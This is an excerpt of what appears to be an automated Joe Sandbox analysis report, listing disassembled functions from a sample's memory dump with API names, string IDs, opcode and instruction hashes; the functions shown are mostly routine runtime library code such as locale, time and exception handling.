                          • Opcode Fuzzy Hash: 525b0c438fb4035c77fddbf3c0749051ca89bb88eca90a5a67994e4ef765752f
                          • Instruction Fuzzy Hash: B6714762F1C74289FB50BB60D8516FDA3E0BF55B89F484035CA0D97696EF3EA849C350
                          Function 00007FF646E6213C Relevance: 9.1, APIs: 6, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                          • String ID:
                          • API String ID: 1239891234-0
                          • Opcode ID: b4bd78832c63ffc38bc4b7b9bc9cfec7b2e0e63a8aba44b8f794553ba38bce15
                          • Instruction ID: f092813eccbe27cf89828799ffec0f78a155dfeb5d2c904f936213101f24b4a1
                          • Opcode Fuzzy Hash: b4bd78832c63ffc38bc4b7b9bc9cfec7b2e0e63a8aba44b8f794553ba38bce15
                          • Instruction Fuzzy Hash: 8E41703261CB8186E760FB65E8443AEB3A0FB84758F500135EA8D83B9ADF3DD549CB00
                          Function 00007FF646E70E18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: 4811875917d21df6671d98e29e382020326e55504065ba1261b18ada398fe05d
                          • Instruction ID: ae94bad0991a8ec57da7f9400e09a9057e1751ba918b1a688e180390a6c7fdab
                          • Opcode Fuzzy Hash: 4811875917d21df6671d98e29e382020326e55504065ba1261b18ada398fe05d
                          • Instruction Fuzzy Hash: A7113D61B1C647C2FE64FB91A44057AA3E1FF48B85F445031EA4AC3696DF3EE8418740
                          Function 00007FF646E6D270 Relevance: 7.8, APIs: 5, Instructions: 286COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FileFindFirst_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 2227656907-0
                          • Opcode ID: ae0f3535cebf2f16635926052113797324354ba022250e17cfec29656ff25a4a
                          • Instruction ID: 104e62b877c360c45c0d011ece68b8a02df8588a4e5f2a32435b6e270a47acfe
                          • Opcode Fuzzy Hash: ae0f3535cebf2f16635926052113797324354ba022250e17cfec29656ff25a4a
                          • Instruction Fuzzy Hash: 4FB1A622B2C69241EB60BB25D5041BDE7D1FB44BE4FC46132EB5E87B95DE7EE8418300
                          Function 00007FF646E5B6F4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 71c2f9d32c63666908bbdffe88acda2111ff4c1698b24ba151b2a5beb859b09e
                          • Instruction ID: a69dc76f8e4d06eed6861bccb739ac8332b69cdc9dedf4759f1ea006dd560376
                          • Opcode Fuzzy Hash: 71c2f9d32c63666908bbdffe88acda2111ff4c1698b24ba151b2a5beb859b09e
                          • Instruction Fuzzy Hash: 02112E22B1DF0189EB00FF60E8542B973A4F719759F440E31DA6D86BA5EF79D1998340
                          Function 00007FF646E51BD0 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 538COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: nan
                          • API String ID: 0-1810114945
                          • Opcode ID: 23788e95d86ea119b9de5308d0ec5394b53d5f87037165902c4512e55167f868
                          • Instruction ID: 709b3be95141243125473de8de2be4d45b19a6d0038e0f28938172f87ee050bb
                          • Opcode Fuzzy Hash: 23788e95d86ea119b9de5308d0ec5394b53d5f87037165902c4512e55167f868
                          • Instruction Fuzzy Hash: C022E162A0DB818AEB51AF75D4402FDBBE1FB54798F444132EA4E83B99DF3AD481C700
                          Function 00007FF646E59694 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: FormatInfoLocaleMessage
                          • String ID: !x-sys-default-locale
                          • API String ID: 4235545615-2729719199
                          • Opcode ID: a473842ff3aab8e4b2404f736d9d38f5af5347cca6232932a22319a5cb45e8eb
                          • Instruction ID: c2bfdbc3d38925f5e881eb55f9b64bfba842bbd208a3ca7e59794af5174b2732
                          • Opcode Fuzzy Hash: a473842ff3aab8e4b2404f736d9d38f5af5347cca6232932a22319a5cb45e8eb
                          • Instruction Fuzzy Hash: 1B01C072B1C78282E711BF52B444BAAA7E1FB88789F084035DA8987A95CF3DD5048B00
                          Function 00007FF646E70A7C Relevance: 4.7, APIs: 3, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: InfoLocale$_invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 4006003004-0
                          • Opcode ID: a45e5575401bfcae3ef80d50b6b8a2df39ddd6a2e94fbbee62b67b96b31e5c09
                          • Instruction ID: fd51bb083624d484be556938336c58820c494349bb3bb08f614811fd398004ec
                          • Opcode Fuzzy Hash: a45e5575401bfcae3ef80d50b6b8a2df39ddd6a2e94fbbee62b67b96b31e5c09
                          • Instruction Fuzzy Hash: 006189B2A0C6428AEB64BE51E5402B9A3E1FB84746F408135CB8EC76D6DF3EE5518740
                          Function 00007FF646E69004 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID: GetLocaleInfoEx
                          • API String ID: 2299586839-2904428671
                          • Opcode ID: 10d9291d30b7ea48bf6201759918a7ba9c5281fd93833f1699422f25f6b848ac
                          • Instruction ID: 803ec3df126e3144bc6551e71484349b56928784818a68fe79de116fa0304674
                          • Opcode Fuzzy Hash: 10d9291d30b7ea48bf6201759918a7ba9c5281fd93833f1699422f25f6b848ac
                          • Instruction Fuzzy Hash: 61016120B0C68381EB44BB1AA540065E3E0BF94BA4F544536DF2C837A6EE2DD4058340
                          Function 00007FF646E4E2A0 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                          Download Yara Rule
                          Strings
                          • 00000000, xrefs: 00007FF646E4E49B
                          • 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899, xrefs: 00007FF646E4E4A5
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: 00000000$00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899
                          • API String ID: 0-756571863
                          • Opcode ID: b0a8d107f1a68ab55612d5a8e34775c07fff1b3a8b821b67c6745b10e953144a
                          • Instruction ID: 9886d27f126eddf817fff7bf0b2c094fc64df58b048d37f2912563c688222626
                          • Opcode Fuzzy Hash: b0a8d107f1a68ab55612d5a8e34775c07fff1b3a8b821b67c6745b10e953144a
                          • Instruction Fuzzy Hash: 5D611222B2C68183EB28AF65A554779A795F744780F909135DB0EC7780DE3EE946CB01
                          Function 00007FF646E42350 Relevance: 1.9, Strings: 1, Instructions: 652COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: gfff
                          • API String ID: 0-1553575800
                          • Opcode ID: a7b7fd96e3f312738d688a4819186b43009dbd0990103d888be1af10e2a805f4
                          • Instruction ID: 8f290fa2ca1ccda188a90b5e548f70b22e25f9756512221ac0a05b5756df7c8d
                          • Opcode Fuzzy Hash: a7b7fd96e3f312738d688a4819186b43009dbd0990103d888be1af10e2a805f4
                          • Instruction Fuzzy Hash: 42322822F1C3928AEB24AF29E444779A6D5FB94784F014135DE4DC7B96DEBEE841CB00
                          Function 00007FF646E62534 Relevance: 1.9, APIs: 1, Instructions: 373COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: Info
                          • String ID:
                          • API String ID: 1807457897-0
                          • Opcode ID: 538eb1fa26b91b46e7813802d89f1fa5b9255dc59f8298bba3d75131239a11cd
                          • Instruction ID: f0429a681a568e0233f22e4f18b6a9b691ad7ca29c4f05ed7524fba83416c247
                          • Opcode Fuzzy Hash: 538eb1fa26b91b46e7813802d89f1fa5b9255dc59f8298bba3d75131239a11cd
                          • Instruction Fuzzy Hash: 6A02AE62A1CBC18AE711EF3894002FDB7A0FB58748F45A235DB9C87652EF3AE195C300
                          Function 00007FF646E6EABC Relevance: 1.8, APIs: 1, Instructions: 337COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 586dfff7b8b4c66d320ccc843005f46dfd2058dd8299404d8188cd963653337c
                          • Instruction ID: b134ea6f3cfa2a169ce0932d04af70bbde2e558e7fd143023a88678f16fbd8aa
                          • Opcode Fuzzy Hash: 586dfff7b8b4c66d320ccc843005f46dfd2058dd8299404d8188cd963653337c
                          • Instruction Fuzzy Hash: EAE15132A0CB8186E720EB65E4412EEB7A4F794788F405635DF8D93B96EF39E255C340
                          Function 00007FF646E4E990 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID:
                          • String ID: gfff
                          • API String ID: 0-1553575800
                          • Opcode ID: 13a95ab29740c7d23fc2ee87a9cb29095b905de4476c40a2ef2f0bdefd286327
                          • Instruction ID: c1ad5e78b7133bd23f50fd54b5447b896b4dc8c4ec4bc064e5c8eea9cb6f1595
                          • Opcode Fuzzy Hash: 13a95ab29740c7d23fc2ee87a9cb29095b905de4476c40a2ef2f0bdefd286327
                          • Instruction Fuzzy Hash: 61F12A6162C29286E71DBE39D604B7CA6D5BF40780F514636EE0BC77D4EEAEEA40C301
                          Function 00007FF646E70CC0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: beb55e11022723b2554d2a277a213dbe89ff21a797af844a07375ed8c01a3e7f
                          • Instruction ID: 33ea808a482e82224e03ba8e42f8e50c6aed251f3e1e925d1c139ff22696450e
                          • Opcode Fuzzy Hash: beb55e11022723b2554d2a277a213dbe89ff21a797af844a07375ed8c01a3e7f
                          • Instruction Fuzzy Hash: D3318DB2A1D78286EB64FA66E4413AAA3E1FB84785F448035DB4DC3286DF3DF4408B00
                          Function 00007FF646E70914 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF646E71115,?,00000000,00000092,?,?,00000000,?,00007FF646E64D97), ref: 00007FF646E709B2
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          • Opcode ID: ed6348ef0a24055b990628f3a14edcfc386b249a782fd5b67276dd459c758fee
                          • Instruction ID: c070298fd27e498161f7d622a0a4c56d8489bf6bb444e9149061f62ffc772462
                          • Opcode Fuzzy Hash: ed6348ef0a24055b990628f3a14edcfc386b249a782fd5b67276dd459c758fee
                          • Instruction Fuzzy Hash: 4111D2A3A1C6458AEB15BF66D0402ACB7E0FBE0BA1F449135C669833C2DE39D5D1C740
                          Function 00007FF646E70ECC Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 8a76b777f494c6ade1e6017019fc2e3c77e2fa5f25233aeb2665c1fed5e531a3
                          • Instruction ID: 3f1629b7d3fe7a950e178662cdd3a944f9a44e617cfd0dd7d19c8b5792b04e87
                          • Opcode Fuzzy Hash: 8a76b777f494c6ade1e6017019fc2e3c77e2fa5f25233aeb2665c1fed5e531a3
                          • Instruction Fuzzy Hash: 1F110672A1C65286E768BBA6900017DB2E0F740B65FA44135EB6D833C5DE7AE481C304
                          Function 00007FF646E709E4 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF646E710D0,?,00000000,00000092,?,?,00000000,?,00007FF646E64D97), ref: 00007FF646E70A62
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          • Opcode ID: 28a95db4e53e5038b06235b7cd575cbc967e51cc460038376f7f095bf7ae1bb4
                          • Instruction ID: 9f20b96f2da7a5d25691b584f1c34761bb82c9829660efb83a338680706ed19a
                          • Opcode Fuzzy Hash: 28a95db4e53e5038b06235b7cd575cbc967e51cc460038376f7f095bf7ae1bb4
                          • Instruction Fuzzy Hash: 1301D8B2F0C28286EB507F55E4407B9B6E1FB40BA6F459231D66C872C6DF7E9881C700
                          Function 00007FF646E68C90 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF646E68FC8,?,?,?,?,?,?,?,?,00000000,00007FF646E6FF44), ref: 00007FF646E68CC6
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: EnumLocalesSystem
                          • String ID:
                          • API String ID: 2099609381-0
                          • Opcode ID: 91be5a33b0e5357b2a95e3de4fa93a416777a48e50bc778751b0ba6fa20f1468
                          • Instruction ID: 870a2c7ae7220b749647a102400dddd40bd043f59f0013df60ea22041f48ff3b
                          • Opcode Fuzzy Hash: 91be5a33b0e5357b2a95e3de4fa93a416777a48e50bc778751b0ba6fa20f1468
                          • Instruction Fuzzy Hash: 5DF05832B0CA0A82E700BB15F480779B3A2FB98B80F949130D64D87366CF3DD4A0C700
                          Function 00007FF646E594B0 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2356694972.00007FF646E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF646E40000, based on PE: true
                          • Associated: 00000003.00000002.2356676245.00007FF646E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356726064.00007FF646E76000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356755496.00007FF646EA8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2356772426.00007FF646EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff646e40000_Ld0f3NDosJ.jbxd
                          Similarity
                          • API ID: ControlDevice
                          • String ID:
                          • API String ID: 2352790924-0
